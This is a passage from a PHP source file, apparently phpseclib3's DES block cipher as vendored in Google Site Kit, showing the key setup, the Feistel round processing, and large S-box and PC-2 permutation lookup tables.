0x800, 0x20820, 0x8000800, 0x20, 0x8000020, 0x8020000, 0x8020020, 0x8000000, 0x20000, 0x8000820, 0x0, 0x8020820, 0x20020, 0x8000020, 0x8020000, 0x8000800, 0x8000820, 0x0, 0x8020820, 0x20800, 0x20800, 0x820, 0x820, 0x20020, 0x8000000, 0x8020800]; /** * Default Constructor. * * @param string $mode * @throws BadModeException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException('Block ciphers cannot be ran in stream mode'); } } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($this->key_length_max == 8) { if ($engine == self::ENGINE_OPENSSL) { // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (\defined('OPENSSL_VERSION_TEXT') && \version_compare(\preg_replace('#OpenSSL (\\d+\\.\\d+\\.\\d+) .*#', '$1', \OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return \false; } $this->cipher_name_openssl_ecb = 'des-ecb'; $this->cipher_name_openssl = 'des-' . $this->openssl_translate_mode(); } } return parent::isValidEngineHelper($engine); } /** * Sets the key. * * Keys must be 64-bits long or 8 bytes long. * * DES also requires that every eighth bit be a parity bit, however, we'll ignore that. * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKey() * @param string $key */ public function setKey($key) { if (!$this instanceof \Google\Site_Kit_Dependencies\phpseclib3\Crypt\TripleDES && \strlen($key) != 8) { throw new \LengthException('Key of size ' . \strlen($key) . ' not supported by this algorithm. Only keys of size 8 are supported'); } // Sets the key parent::setKey($key); } /** * Encrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::encryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::encrypt() * @see self::encrypt() * @param string $in * @return string */ protected function encryptBlock($in) { return $this->processBlock($in, self::ENCRYPT); } /** * Decrypts a block * * @see \phpseclib3\Crypt\Common\SymmetricKey::decryptBlock() * @see \phpseclib3\Crypt\Common\SymmetricKey::decrypt() * @see self::decrypt() * @param string $in * @return string */ protected function decryptBlock($in) { return $this->processBlock($in, self::DECRYPT); } /** * Encrypts or decrypts a 64-bit block * * $mode should be either self::ENCRYPT or self::DECRYPT. See * {@link http://en.wikipedia.org/wiki/Image:Feistel.png Feistel.png} to get a general * idea of what this function does. * * @see self::encryptBlock() * @see self::decryptBlock() * @param string $block * @param int $mode * @return string */ private function processBlock($block, $mode) { static $sbox1, $sbox2, $sbox3, $sbox4, $sbox5, $sbox6, $sbox7, $sbox8, $shuffleip, $shuffleinvip; if (!$sbox1) { $sbox1 = \array_map('intval', self::$sbox1); $sbox2 = \array_map('intval', self::$sbox2); $sbox3 = \array_map('intval', self::$sbox3); $sbox4 = \array_map('intval', self::$sbox4); $sbox5 = \array_map('intval', self::$sbox5); $sbox6 = \array_map('intval', self::$sbox6); $sbox7 = \array_map('intval', self::$sbox7); $sbox8 = \array_map('intval', self::$sbox8); /* Merge $shuffle with $[inv]ipmap */ for ($i = 0; $i < 256; ++$i) { $shuffleip[] = self::$shuffle[self::$ipmap[$i]]; $shuffleinvip[] = self::$shuffle[self::$invipmap[$i]]; } } $keys = $this->keys[$mode]; $ki = -1; // Do the initial IP permutation. $t = \unpack('Nl/Nr', $block); list($l, $r) = [$t['l'], $t['r']]; $block = $shuffleip[$r & 0xff] & "\x80\x80\x80\x80\x80\x80\x80\x80" | $shuffleip[$r >> 8 & 0xff] & "@@@@@@@@" | $shuffleip[$r >> 16 & 0xff] & " " | $shuffleip[$r >> 24 & 0xff] & "\x10\x10\x10\x10\x10\x10\x10\x10" | $shuffleip[$l & 0xff] & "\x08\x08\x08\x08\x08\x08\x08\x08" | $shuffleip[$l >> 8 & 0xff] & "\x04\x04\x04\x04\x04\x04\x04\x04" | $shuffleip[$l >> 16 & 0xff] & "\x02\x02\x02\x02\x02\x02\x02\x02" | $shuffleip[$l >> 24 & 0xff] & "\x01\x01\x01\x01\x01\x01\x01\x01"; // Extract L0 and R0. $t = \unpack('Nl/Nr', $block); list($l, $r) = [$t['l'], $t['r']]; for ($des_round = 0; $des_round < $this->des_rounds; ++$des_round) { // Perform the 16 steps. for ($i = 0; $i < 16; $i++) { // start of "the Feistel (F) function" - see the following URL: // http://en.wikipedia.org/wiki/Image:Data_Encryption_Standard_InfoBox_Diagram.png // Merge key schedule. $b1 = $r >> 3 & 0x1fffffff ^ $r << 29 ^ $keys[++$ki]; $b2 = $r >> 31 & 0x1 ^ $r << 1 ^ $keys[++$ki]; // S-box indexing. $t = $sbox1[$b1 >> 24 & 0x3f] ^ $sbox2[$b2 >> 24 & 0x3f] ^ $sbox3[$b1 >> 16 & 0x3f] ^ $sbox4[$b2 >> 16 & 0x3f] ^ $sbox5[$b1 >> 8 & 0x3f] ^ $sbox6[$b2 >> 8 & 0x3f] ^ $sbox7[$b1 & 0x3f] ^ $sbox8[$b2 & 0x3f] ^ $l; // end of "the Feistel (F) function" $l = $r; $r = $t; } // Last step should not permute L & R. $t = $l; $l = $r; $r = $t; } // Perform the inverse IP permutation. return $shuffleinvip[$r >> 24 & 0xff] & "\x80\x80\x80\x80\x80\x80\x80\x80" | $shuffleinvip[$l >> 24 & 0xff] & "@@@@@@@@" | $shuffleinvip[$r >> 16 & 0xff] & " " | $shuffleinvip[$l >> 16 & 0xff] & "\x10\x10\x10\x10\x10\x10\x10\x10" | $shuffleinvip[$r >> 8 & 0xff] & "\x08\x08\x08\x08\x08\x08\x08\x08" | $shuffleinvip[$l >> 8 & 0xff] & "\x04\x04\x04\x04\x04\x04\x04\x04" | $shuffleinvip[$r & 0xff] & "\x02\x02\x02\x02\x02\x02\x02\x02" | $shuffleinvip[$l & 0xff] & "\x01\x01\x01\x01\x01\x01\x01\x01"; } /** * Creates the key schedule * * @see \phpseclib3\Crypt\Common\SymmetricKey::setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key'] && $this->des_rounds === $this->kl['des_rounds']) { // already expanded return; } $this->kl = ['key' => $this->key, 'des_rounds' => $this->des_rounds]; static $shifts = [ // number of key bits shifted per round 1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1, ]; static $pc1map = [0x0, 0x0, 0x8, 0x8, 0x4, 0x4, 0xc, 0xc, 0x2, 0x2, 0xa, 0xa, 0x6, 0x6, 0xe, 0xe, 0x10, 0x10, 0x18, 0x18, 0x14, 0x14, 0x1c, 0x1c, 0x12, 0x12, 0x1a, 0x1a, 0x16, 0x16, 0x1e, 0x1e, 0x20, 0x20, 0x28, 0x28, 0x24, 0x24, 0x2c, 0x2c, 0x22, 0x22, 0x2a, 0x2a, 0x26, 0x26, 0x2e, 0x2e, 0x30, 0x30, 0x38, 0x38, 0x34, 0x34, 0x3c, 0x3c, 0x32, 0x32, 0x3a, 0x3a, 0x36, 0x36, 0x3e, 0x3e, 0x40, 0x40, 0x48, 0x48, 0x44, 0x44, 0x4c, 0x4c, 0x42, 0x42, 0x4a, 0x4a, 0x46, 0x46, 0x4e, 0x4e, 0x50, 0x50, 0x58, 0x58, 0x54, 0x54, 0x5c, 0x5c, 0x52, 0x52, 0x5a, 0x5a, 0x56, 0x56, 0x5e, 0x5e, 0x60, 0x60, 0x68, 0x68, 0x64, 0x64, 0x6c, 0x6c, 0x62, 0x62, 0x6a, 0x6a, 0x66, 0x66, 0x6e, 0x6e, 0x70, 0x70, 0x78, 0x78, 0x74, 0x74, 0x7c, 0x7c, 0x72, 0x72, 0x7a, 0x7a, 0x76, 0x76, 0x7e, 0x7e, 0x80, 0x80, 0x88, 0x88, 0x84, 0x84, 0x8c, 0x8c, 0x82, 0x82, 0x8a, 0x8a, 0x86, 0x86, 0x8e, 0x8e, 0x90, 0x90, 0x98, 0x98, 0x94, 0x94, 0x9c, 0x9c, 0x92, 0x92, 0x9a, 0x9a, 0x96, 0x96, 0x9e, 0x9e, 0xa0, 0xa0, 0xa8, 0xa8, 0xa4, 0xa4, 0xac, 0xac, 0xa2, 0xa2, 0xaa, 0xaa, 0xa6, 0xa6, 0xae, 0xae, 0xb0, 0xb0, 0xb8, 0xb8, 0xb4, 0xb4, 0xbc, 0xbc, 0xb2, 0xb2, 0xba, 0xba, 0xb6, 0xb6, 0xbe, 0xbe, 0xc0, 0xc0, 0xc8, 0xc8, 0xc4, 0xc4, 0xcc, 0xcc, 0xc2, 0xc2, 0xca, 0xca, 0xc6, 0xc6, 0xce, 0xce, 0xd0, 0xd0, 0xd8, 0xd8, 0xd4, 0xd4, 0xdc, 0xdc, 0xd2, 0xd2, 0xda, 0xda, 0xd6, 0xd6, 0xde, 0xde, 0xe0, 0xe0, 0xe8, 0xe8, 0xe4, 0xe4, 0xec, 0xec, 0xe2, 0xe2, 0xea, 0xea, 0xe6, 0xe6, 0xee, 0xee, 0xf0, 0xf0, 0xf8, 0xf8, 0xf4, 0xf4, 0xfc, 0xfc, 0xf2, 0xf2, 0xfa, 0xfa, 0xf6, 0xf6, 0xfe, 0xfe]; // Mapping tables for the PC-2 transformation. static $pc2mapc1 = [0x0, 0x400, 0x200000, 0x200400, 0x1, 0x401, 0x200001, 0x200401, 0x2000000, 0x2000400, 0x2200000, 0x2200400, 0x2000001, 0x2000401, 0x2200001, 0x2200401]; static $pc2mapc2 = [0x0, 0x800, 0x8000000, 0x8000800, 0x10000, 0x10800, 0x8010000, 0x8010800, 0x0, 0x800, 0x8000000, 0x8000800, 0x10000, 0x10800, 0x8010000, 0x8010800, 0x100, 0x900, 0x8000100, 0x8000900, 0x10100, 0x10900, 0x8010100, 0x8010900, 0x100, 0x900, 0x8000100, 0x8000900, 0x10100, 0x10900, 0x8010100, 0x8010900, 0x10, 0x810, 0x8000010, 0x8000810, 0x10010, 0x10810, 0x8010010, 0x8010810, 0x10, 0x810, 0x8000010, 0x8000810, 0x10010, 0x10810, 0x8010010, 0x8010810, 0x110, 0x910, 0x8000110, 0x8000910, 0x10110, 0x10910, 0x8010110, 0x8010910, 0x110, 0x910, 0x8000110, 0x8000910, 0x10110, 0x10910, 0x8010110, 0x8010910, 0x40000, 0x40800, 0x8040000, 0x8040800, 0x50000, 0x50800, 0x8050000, 0x8050800, 0x40000, 0x40800, 0x8040000, 0x8040800, 0x50000, 0x50800, 0x8050000, 0x8050800, 0x40100, 0x40900, 0x8040100, 0x8040900, 0x50100, 0x50900, 0x8050100, 0x8050900, 0x40100, 0x40900, 0x8040100, 0x8040900, 0x50100, 0x50900, 0x8050100, 0x8050900, 0x40010, 0x40810, 0x8040010, 0x8040810, 0x50010, 0x50810, 0x8050010, 0x8050810, 0x40010, 0x40810, 0x8040010, 0x8040810, 0x50010, 0x50810, 0x8050010, 0x8050810, 0x40110, 0x40910, 0x8040110, 0x8040910, 0x50110, 0x50910, 0x8050110, 0x8050910, 0x40110, 0x40910, 0x8040110, 0x8040910, 0x50110, 0x50910, 0x8050110, 0x8050910, 0x1000000, 0x1000800, 0x9000000, 0x9000800, 0x1010000, 0x1010800, 0x9010000, 0x9010800, 0x1000000, 0x1000800, 0x9000000, 0x9000800, 0x1010000, 0x1010800, 0x9010000, 0x9010800, 0x1000100, 0x1000900, 0x9000100, 0x9000900, 0x1010100, 0x1010900, 0x9010100, 0x9010900, 0x1000100, 0x1000900, 0x9000100, 0x9000900, 0x1010100, 0x1010900, 0x9010100, 0x9010900, 0x1000010, 0x1000810, 0x9000010, 0x9000810, 0x1010010, 0x1010810, 0x9010010, 0x9010810, 0x1000010, 0x1000810, 0x9000010, 0x9000810, 0x1010010, 0x1010810, 0x9010010, 0x9010810, 0x1000110, 0x1000910, 0x9000110, 0x9000910, 0x1010110, 0x1010910, 0x9010110, 0x9010910, 0x1000110, 0x1000910, 0x9000110, 0x9000910, 0x1010110, 0x1010910, 0x9010110, 0x9010910, 0x1040000, 0x1040800, 0x9040000, 0x9040800, 0x1050000, 0x1050800, 0x9050000, 0x9050800, 0x1040000, 0x1040800, 0x9040000, 0x9040800, 0x1050000, 0x1050800, 0x9050000, 0x9050800, 0x1040100, 0x1040900, 0x9040100, 0x9040900, 0x1050100, 0x1050900, 0x9050100, 0x9050900, 0x1040100, 0x1040900, 0x9040100, 0x9040900, 0x1050100, 0x1050900, 0x9050100, 0x9050900, 0x1040010, 0x1040810, 0x9040010, 0x9040810, 0x1050010, 0x1050810, 0x9050010, 0x9050810, 0x1040010, 0x1040810, 0x9040010, 0x9040810, 0x1050010, 0x1050810, 0x9050010, 0x9050810, 0x1040110, 0x1040910, 0x9040110, 0x9040910, 0x1050110, 0x1050910, 0x9050110, 0x9050910, 0x1040110, 0x1040910, 0x9040110, 0x9040910, 0x1050110, 0x1050910, 0x9050110, 0x9050910]; static $pc2mapc3 = [0x0, 0x4, 0x1000, 0x1004, 0x0, 0x4, 0x1000, 0x1004, 0x10000000, 0x10000004, 0x10001000, 0x10001004, 0x10000000, 0x10000004, 0x10001000, 0x10001004, 0x20, 0x24, 0x1020, 0x1024, 0x20, 0x24, 0x1020, 0x1024, 0x10000020, 0x10000024, 0x10001020, 0x10001024, 0x10000020, 0x10000024, 0x10001020, 0x10001024, 0x80000, 0x80004, 0x81000, 0x81004, 0x80000, 0x80004, 0x81000, 0x81004, 0x10080000, 0x10080004, 0x10081000, 0x10081004, 0x10080000, 0x10080004, 0x10081000, 0x10081004, 0x80020, 0x80024, 0x81020, 0x81024, 0x80020, 0x80024, 0x81020, 0x81024, 0x10080020, 0x10080024, 0x10081020, 0x10081024, 0x10080020, 0x10080024, 0x10081020, 0x10081024, 0x20000000, 0x20000004, 0x20001000, 0x20001004, 0x20000000, 0x20000004, 0x20001000, 0x20001004, 0x30000000, 0x30000004, 0x30001000, 0x30001004, 0x30000000, 0x30000004, 0x30001000, 0x30001004, 0x20000020, 0x20000024, 0x20001020, 0x20001024, 0x20000020, 0x20000024, 0x20001020, 0x20001024, 0x30000020, 0x30000024, 0x30001020, 0x30001024, 0x30000020, 0x30000024, 0x30001020, 0x30001024, 0x20080000, 0x20080004, 0x20081000, 0x20081004, 0x20080000, 0x20080004, 0x20081000, 0x20081004, 0x30080000, 0x30080004, 0x30081000, 0x30081004, 0x30080000, 0x30080004, 0x30081000, 0x30081004, 0x20080020, 0x20080024, 0x20081020, 0x20081024, 0x20080020, 0x20080024, 0x20081020, 0x20081024, 0x30080020, 0x30080024, 0x30081020, 0x30081024, 0x30080020, 0x30080024, 0x30081020, 0x30081024, 0x2, 0x6, 0x1002, 0x1006, 0x2, 0x6, 0x1002, 0x1006, 0x10000002, 0x10000006, 0x10001002, 0x10001006, 0x10000002, 0x10000006, 0x10001002, 0x10001006, 0x22, 0x26, 0x1022, 0x1026, 0x22, 0x26, 0x1022, 0x1026, 0x10000022, 0x10000026, 0x10001022, 0x10001026, 0x10000022, 0x10000026, 0x10001022, 0x10001026, 0x80002, 0x80006, 0x81002, 0x81006, 0x80002, 0x80006, 0x81002, 0x81006, 0x10080002, 0x10080006, 0x10081002, 0x10081006, 0x10080002, 0x10080006, 0x10081002, 0x10081006, 0x80022, 0x80026, 0x81022, 0x81026, 0x80022, 0x80026, 0x81022, 0x81026, 0x10080022, 0x10080026, 0x10081022, 0x10081026, 0x10080022, 0x10080026, 0x10081022, 0x10081026, 0x20000002, 0x20000006, 0x20001002, 0x20001006, 0x20000002, 0x20000006, 0x20001002, 0x20001006, 0x30000002, 0x30000006, 0x30001002, 0x30001006, 0x30000002, 0x30000006, 0x30001002, 0x30001006, 0x20000022, 0x20000026, 0x20001022, 0x20001026, 0x20000022, 0x20000026, 0x20001022, 0x20001026, 0x30000022, 0x30000026, 0x30001022, 0x30001026, 0x30000022, 0x30000026, 0x30001022, 0x30001026, 0x20080002, 0x20080006, 0x20081002, 0x20081006, 0x20080002, 0x20080006, 0x20081002, 0x20081006, 0x30080002, 0x30080006, 0x30081002, 0x30081006, 0x30080002, 0x30080006, 0x30081002, 0x30081006, 0x20080022, 0x20080026, 0x20081022, 0x20081026, 0x20080022, 0x20080026, 0x20081022, 0x20081026, 0x30080022, 0x30080026, 0x30081022, 0x30081026, 0x30080022, 0x30080026, 0x30081022, 0x30081026]; static $pc2mapc4 = [0x0, 0x100000, 0x8, 0x100008, 0x200, 0x100200, 0x208, 0x100208, 0x0, 0x100000, 0x8, 0x100008, 0x200, 0x100200, 0x208, 0x100208, 0x4000000, 0x4100000, 0x4000008, 0x4100008, 0x4000200, 0x4100200, 0x4000208, 0x4100208, 0x4000000, 0x4100000, 0x4000008, 0x4100008, 0x4000200, 0x4100200, 0x4000208, 0x4100208, 0x2000, 0x102000, 0x2008, 0x102008, 0x2200, 0x102200, 0x2208, 0x102208, 0x2000, 0x102000, 0x2008, 0x102008, 0x2200, 0x102200, 0x2208, 0x102208, 0x4002000, 0x4102000, 0x4002008, 0x4102008, 0x4002200, 0x4102200, 0x4002208, 0x4102208, 0x4002000, 0x4102000, 0x4002008, 0x4102008, 0x4002200, 0x4102200, 0x4002208, 0x4102208, 0x0, 0x100000, 0x8, 0x100008, 0x200, 0x100200, 0x208, 0x100208, 0x0, 0x100000, 0x8, 0x100008, 0x200, 0x100200, 0x208, 0x100208, 0x4000000, 0x4100000, 0x4000008, 0x4100008, 0x4000200, 0x4100200, 0x4000208, 0x4100208, 0x4000000, 0x4100000, 0x4000008, 0x4100008, 0x4000200, 0x4100200, 0x4000208, 0x4100208, 0x2000, 0x102000, 0x2008, 0x102008, 0x2200, 0x102200, 0x2208, 0x102208, 0x2000, 0x102000, 0x2008, 0x102008, 0x2200, 0x102200, 0x2208, 0x102208, 0x4002000, 0x4102000, 0x4002008, 0x4102008, 0x4002200, 0x4102200, 0x4002208, 0x4102208, 0x4002000, 0x4102000, 0x4002008, 0x4102008, 0x4002200, 0x4102200, 0x4002208, 0x4102208, 0x20000, 0x120000, 0x20008, 0x120008, 0x20200, 0x120200, 0x20208, 0x120208, 0x20000, 0x120000, 0x20008, 0x120008, 0x20200, 0x120200, 0x20208, 0x120208, 0x4020000, 0x4120000, 0x4020008, 0x4120008, 0x4020200, 0x4120200, 0x4020208, 0x4120208, 0x4020000, 0x4120000, 0x4020008, 0x4120008, 0x4020200, 0x4120200, 0x4020208, 0x4120208, 0x22000, 0x122000, 0x22008, 0x122008, 0x22200, 0x122200, 0x22208, 0x122208, 0x22000, 0x122000, 0x22008, 0x122008, 0x22200, 0x122200, 0x22208, 0x122208, 0x4022000, 0x4122000, 0x4022008, 0x4122008, 0x4022200, 0x4122200, 0x4022208, 0x4122208, 0x4022000, 0x4122000, 0x4022008, 0x4122008, 0x4022200, 0x4122200, 0x4022208, 0x4122208, 0x20000, 0x120000, 0x20008, 0x120008, 0x20200, 0x120200, 0x20208, 0x120208, 0x20000, 0x120000, 0x20008, 0x120008, 0x20200, 0x120200, 0x20208, 0x120208, 0x4020000, 0x4120000, 0x4020008, 0x4120008, 0x4020200, 0x4120200, 0x4020208, 0x4120208, 0x4020000, 0x4120000, 0x4020008, 0x4120008, 0x4020200, 0x4120200, 0x4020208, 0x4120208, 0x22000, 0x122000, 0x22008, 0x122008, 0x22200, 0x122200, 0x22208, 0x122208, 0x22000, 0x122000, 0x22008, 0x122008, 0x22200, 0x122200, 0x22208, 0x122208, 0x4022000, 0x4122000, 0x4022008, 0x4122008, 0x4022200, 0x4122200, 0x4022208, 0x4122208, 0x4022000, 0x4122000, 0x4022008, 0x4122008, 0x4022200, 0x4122200, 0x4022208, 0x4122208]; static $pc2mapd1 = [0x0, 0x1, 0x8000000, 0x8000001, 0x200000, 0x200001, 0x8200000, 0x8200001, 0x2, 0x3, 0x8000002, 0x8000003, 0x200002, 0x200003, 0x8200002, 0x8200003]; static $pc2mapd2 = [0x0, 0x100000, 0x800, 0x100800, 0x0, 0x100000, 0x800, 0x100800, 0x4000000, 0x4100000, 0x4000800, 0x4100800, 0x4000000, 0x4100000, 0x4000800, 0x4100800, 0x4, 0x100004, 0x804, 0x100804, 0x4, 0x100004, 0x804, 0x100804, 0x4000004, 0x4100004, 0x4000804, 0x4100804, 0x4000004, 0x4100004, 0x4000804, 0x4100804, 0x0, 0x100000, 0x800, 0x100800, 0x0, 0x100000, 0x800, 0x100800, 0x4000000, 0x4100000, 0x4000800, 0x4100800, 0x4000000, 0x4100000, 0x4000800, 0x4100800, 0x4, 0x100004, 0x804, 0x100804, 0x4, 0x100004, 0x804, 0x100804, 0x4000004, 0x4100004, 0x4000804, 0x4100804, 0x4000004, 0x4100004, 0x4000804, 0x4100804, 0x200, 0x100200, 0xa00, 0x100a00, 0x200, 0x100200, 0xa00, 0x100a00, 0x4000200, 0x4100200, 0x4000a00, 0x4100a00, 0x4000200, 0x4100200, 0x4000a00, 0x4100a00, 0x204, 0x100204, 0xa04, 0x100a04, 0x204, 0x100204, 0xa04, 0x100a04, 0x4000204, 0x4100204, 0x4000a04, 0x4100a04, 0x4000204, 0x4100204, 0x4000a04, 0x4100a04, 0x200, 0x100200, 0xa00, 0x100a00, 0x200, 0x100200, 0xa00, 0x100a00, 0x4000200, 0x4100200, 0x4000a00, 0x4100a00, 0x4000200, 0x4100200, 0x4000a00, 0x4100a00, 0x204, 0x100204, 0xa04, 0x100a04, 0x204, 0x100204, 0xa04, 0x100a04, 0x4000204, 0x4100204, 0x4000a04, 0x4100a04, 0x4000204, 0x4100204, 0x4000a04, 0x4100a04, 0x20000, 0x120000, 0x20800, 0x120800, 0x20000, 0x120000, 0x20800, 0x120800, 0x4020000, 0x4120000, 0x4020800, 0x4120800, 0x4020000, 0x4120000, 0x4020800, 0x4120800, 0x20004, 0x120004, 0x20804, 0x120804, 0x20004, 0x120004, 0x20804, 0x120804, 0x4020004, 0x4120004, 0x4020804, 0x4120804, 0x4020004, 0x4120004, 0x4020804, 0x4120804, 0x20000, 0x120000, 0x20800, 0x120800, 0x20000, 0x120000, 0x20800, 0x120800, 0x4020000, 0x4120000, 0x4020800, 0x4120800, 0x4020000, 0x4120000, 0x4020800, 0x4120800, 0x20004, 0x120004, 0x20804, 0x120804, 0x20004, 0x120004, 0x20804, 0x120804, 0x4020004, 0x4120004, 0x4020804, 0x4120804, 0x4020004, 0x4120004, 0x4020804, 0x4120804, 0x20200, 0x120200, 0x20a00, 0x120a00, 0x20200, 0x120200, 0x20a00, 0x120a00, 0x4020200, 0x4120200, 0x4020a00, 0x4120a00, 0x4020200, 0x4120200, 0x4020a00, 0x4120a00, 0x20204, 0x120204, 0x20a04, 0x120a04, 0x20204, 0x120204, 0x20a04, 0x120a04, 0x4020204, 0x4120204, 0x4020a04, 0x4120a04, 0x4020204, 0x4120204, 0x4020a04, 0x4120a04, 0x20200, 0x120200, 0x20a00, 0x120a00, 0x20200, 0x120200, 0x20a00, 0x120a00, 0x4020200, 0x4120200, 0x4020a00, 0x4120a00, 0x4020200, 0x4120200, 0x4020a00, 0x4120a00, 0x20204, 0x120204, 0x20a04, 0x120a04, 0x20204, 0x120204, 0x20a04, 0x120a04, 0x4020204, 0x4120204, 0x4020a04, 0x4120a04, 0x4020204, 0x4120204, 0x4020a04, 0x4120a04]; static $pc2mapd3 = [0x0, 0x10000, 0x2000000, 0x2010000, 0x20, 0x10020, 0x2000020, 0x2010020, 0x40000, 0x50000, 0x2040000, 0x2050000, 0x40020, 0x50020, 0x2040020, 0x2050020, 0x2000, 0x12000, 0x2002000, 0x2012000, 0x2020, 0x12020, 0x2002020, 0x2012020, 0x42000, 0x52000, 0x2042000, 0x2052000, 0x42020, 0x52020, 0x2042020, 0x2052020, 0x0, 0x10000, 0x2000000, 0x2010000, 0x20, 0x10020, 0x2000020, 0x2010020, 0x40000, 0x50000, 0x2040000, 0x2050000, 0x40020, 0x50020, 0x2040020, 0x2050020, 0x2000, 0x12000, 0x2002000, 0x2012000, 0x2020, 0x12020, 0x2002020, 0x2012020, 0x42000, 0x52000, 0x2042000, 0x2052000, 0x42020, 0x52020, 0x2042020, 0x2052020, 0x10, 0x10010, 0x2000010, 0x2010010, 0x30, 0x10030, 0x2000030, 0x2010030, 0x40010, 0x50010, 0x2040010, 0x2050010, 0x40030, 0x50030, 0x2040030, 0x2050030, 0x2010, 0x12010, 0x2002010, 0x2012010, 0x2030, 0x12030, 0x2002030, 0x2012030, 0x42010, 0x52010, 0x2042010, 0x2052010, 0x42030, 0x52030, 0x2042030, 0x2052030, 0x10, 0x10010, 0x2000010, 0x2010010, 0x30, 0x10030, 0x2000030, 0x2010030, 0x40010, 0x50010, 0x2040010, 0x2050010, 0x40030, 0x50030, 0x2040030, 0x2050030, 0x2010, 0x12010, 0x2002010, 0x2012010, 0x2030, 0x12030, 0x2002030, 0x2012030, 0x42010, 0x52010, 0x2042010, 0x2052010, 0x42030, 0x52030, 0x2042030, 0x2052030, 0x20000000, 0x20010000, 0x22000000, 0x22010000, 0x20000020, 0x20010020, 0x22000020, 0x22010020, 0x20040000, 0x20050000, 0x22040000, 0x22050000, 0x20040020, 0x20050020, 0x22040020, 0x22050020, 0x20002000, 0x20012000, 0x22002000, 0x22012000, 0x20002020, 0x20012020, 0x22002020, 0x22012020, 0x20042000, 0x20052000, 0x22042000, 0x22052000, 0x20042020, 0x20052020, 0x22042020, 0x22052020, 0x20000000, 0x20010000, 0x22000000, 0x22010000, 0x20000020, 0x20010020, 0x22000020, 0x22010020, 0x20040000, 0x20050000, 0x22040000, 0x22050000, 0x20040020, 0x20050020, 0x22040020, 0x22050020, 0x20002000, 0x20012000, 0x22002000, 0x22012000, 0x20002020, 0x20012020, 0x22002020, 0x22012020, 0x20042000, 0x20052000, 0x22042000, 0x22052000, 0x20042020, 0x20052020, 0x22042020, 0x22052020, 0x20000010, 0x20010010, 0x22000010, 0x22010010, 0x20000030, 0x20010030, 0x22000030, 0x22010030, 0x20040010, 0x20050010, 0x22040010, 0x22050010, 0x20040030, 0x20050030, 0x22040030, 0x22050030, 0x20002010, 0x20012010, 0x22002010, 0x22012010, 0x20002030, 0x20012030, 0x22002030, 0x22012030, 0x20042010, 0x20052010, 0x22042010, 0x22052010, 0x20042030, 0x20052030, 0x22042030, 0x22052030, 0x20000010, 0x20010010, 0x22000010, 0x22010010, 0x20000030, 0x20010030, 0x22000030, 0x22010030, 0x20040010, 0x20050010, 0x22040010, 0x22050010, 0x20040030, 0x20050030, 0x22040030, 0x22050030, 0x20002010, 0x20012010, 0x22002010, 0x22012010, 0x20002030, 0x20012030, 0x22002030, 0x22012030, 0x20042010, 0x20052010, 0x22042010, 0x22052010, 0x20042030, 0x20052030, 0x22042030, 0x22052030]; static $pc2mapd4 = [0x0, 0x400, 0x1000000, 0x1000400, 0x0, 0x400, 0x1000000, 0x1000400, 0x100, 0x500, 0x1000100, 0x1000500, 0x100, 0x500, 0x1000100, 0x1000500, 0x10000000, 0x10000400, 0x11000000, 0x11000400, 0x10000000, 0x10000400, 0x11000000, 0x11000400, 0x10000100, 0x10000500, 0x11000100, 0x11000500, 0x10000100, 0x10000500, 0x11000100, 0x11000500, 0x80000, 0x80400, 0x1080000, 0x1080400, 0x80000, 0x80400, 0x1080000, 0x1080400, 0x80100, 0x80500, 0x1080100, 0x1080500, 0x80100, 0x80500, 0x1080100, 0x1080500, 0x10080000, 0x10080400, 0x11080000, 0x11080400, 0x10080000, 0x10080400, 0x11080000, 0x11080400, 0x10080100, 0x10080500, 0x11080100, 0x11080500, 0x10080100, 0x10080500, 0x11080100, 0x11080500, 0x8, 0x408, 0x1000008, 0x1000408, 0x8, 0x408, 0x1000008, 0x1000408, 0x108, 0x508, 0x1000108, 0x1000508, 0x108, 0x508, 0x1000108, 0x1000508, 0x10000008, 0x10000408, 0x11000008, 0x11000408, 0x10000008, 0x10000408, 0x11000008, 0x11000408, 0x10000108, 0x10000508, 0x11000108, 0x11000508, 0x10000108, 0x10000508, 0x11000108, 0x11000508, 0x80008, 0x80408, 0x1080008, 0x1080408, 0x80008, 0x80408, 0x1080008, 0x1080408, 0x80108, 0x80508, 0x1080108, 0x1080508, 0x80108, 0x80508, 0x1080108, 0x1080508, 0x10080008, 0x10080408, 0x11080008, 0x11080408, 0x10080008, 0x10080408, 0x11080008, 0x11080408, 0x10080108, 0x10080508, 0x11080108, 0x11080508, 0x10080108, 0x10080508, 0x11080108, 0x11080508, 0x1000, 0x1400, 0x1001000, 0x1001400, 0x1000, 0x1400, 0x1001000, 0x1001400, 0x1100, 0x1500, 0x1001100, 0x1001500, 0x1100, 0x1500, 0x1001100, 0x1001500, 0x10001000, 0x10001400, 0x11001000, 0x11001400, 0x10001000, 0x10001400, 0x11001000, 0x11001400, 0x10001100, 0x10001500, 0x11001100, 0x11001500, 0x10001100, 0x10001500, 0x11001100, 0x11001500, 0x81000, 0x81400, 0x1081000, 0x1081400, 0x81000, 0x81400, 0x1081000, 0x1081400, 0x81100, 0x81500, 0x1081100, 0x1081500, 0x81100, 0x81500, 0x1081100, 0x1081500, 0x10081000, 0x10081400, 0x11081000, 0x11081400, 0x10081000, 0x10081400, 0x11081000, 0x11081400, 0x10081100, 0x10081500, 0x11081100, 0x11081500, 0x10081100, 0x10081500, 0x11081100, 0x11081500, 0x1008, 0x1408, 0x1001008, 0x1001408, 0x1008, 0x1408, 0x1001008, 0x1001408, 0x1108, 0x1508, 0x1001108, 0x1001508, 0x1108, 0x1508, 0x1001108, 0x1001508, 0x10001008, 0x10001408, 0x11001008, 0x11001408, 0x10001008, 0x10001408, 0x11001008, 